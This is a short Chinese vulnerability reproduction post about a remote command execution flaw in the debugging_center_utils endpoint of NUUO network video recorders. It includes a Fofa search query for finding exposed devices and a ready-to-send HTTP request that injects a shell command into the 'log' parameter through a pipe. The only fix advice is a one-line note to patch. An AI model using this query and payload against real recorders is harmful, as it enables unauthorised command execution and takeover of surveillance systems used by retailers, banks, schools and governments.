NUUO摄像头 debugging_center_utils 远程命令执行漏洞复现

0x01 产品描述：

‌       NUUO摄像头‌是由中国台湾NUUO公司生产的一款网络视频录像机（Network Video Recorder，简称NVR），广泛应用于零售、交通、教育、政府和银行等多个领域。它能够同时管理多个IP摄像头，实现视频录制、存储、回放及远程监控等功能，采用先进的视频处理技术，提供高清、流畅的视频画面，满足各种复杂环境下的监控需求‌。
0x02 漏洞描述：

        NUUO NVR摄像头在debugging_center_utils接口处存在远程命令执行，攻击者可通过该漏洞在服务器上执行任意命令，获取服务器权限。
0x03 搜索语句：

Fofa：title="Network Video Recorder Login" || body="www.nuuo.com/eHelpdesk.php"

0x04 漏洞复现：

GET /__debugging_center_utils___.php?log=|netstat HTTP/1.1
Host: your-ip
Content-Type: text/xml; charset=utf-8
Content-Length: length

0x05 修复建议：

厂商已发布补丁 请即时修复